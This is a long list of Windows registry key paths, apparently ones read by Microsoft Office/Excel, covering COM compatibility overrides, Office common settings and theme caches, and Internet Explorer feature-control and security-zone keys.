HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFC7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABAFD0-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C5-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{ECABB0C7-7F19-11D2-978E-0000F8757E2A}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{F4E1E7F6-A035-41B3-9856-A3C3A1C4684F}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\UseAlternateOutlookAppUserModelId
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Fonts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts\CloudFontsVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\GracefulExit\EXCEL
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\GracefulExit\EXCEL\2840
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\GracefulExit\EXCEL\2840\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\GracefulExit\EXCEL\2840
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetrySent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbControl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbOn
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbSysIcon
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbTips
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbST
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\NetworkStatusCache\officeclient.microsoft.com
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\LCCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Deprecated
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\NextUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03090430
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457444
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033917
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033919
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033921
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457464
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033925
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457475
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM10001114
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033927
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457485
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457491
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457496
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM10001115
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457503
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457510
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033929
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM04033937
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03457515
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\TM03090434
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\NextUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328884
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328893
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328905
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328908
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328916
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328919
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328925
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328932
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328935
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328940
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328998
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328972
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328951
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328975
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328983
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328986
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\TM03328990
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\NotificationsNeverShowAgainLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\DisableBackgrounds
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\OSM
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\OSM
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OSM
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\OSM
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Met
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Met
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\UI Theme
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Default UI Theme
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Default UI Theme
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UISettings\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\NetworkStatusCache\www.microsoft.com
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\ZoneMap\Ranges
HKEY_LOCAL_MACHINE\ZoneMap\Ranges
HKEY_CURRENT_USER\ZoneMap\Ranges
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_CURRENT_USER\Software
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\(Default)
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URI_DISABLECACHE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URI_DISABLECACHE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URI_DISABLECACHE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\EXCEL.EXE
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\(Default)
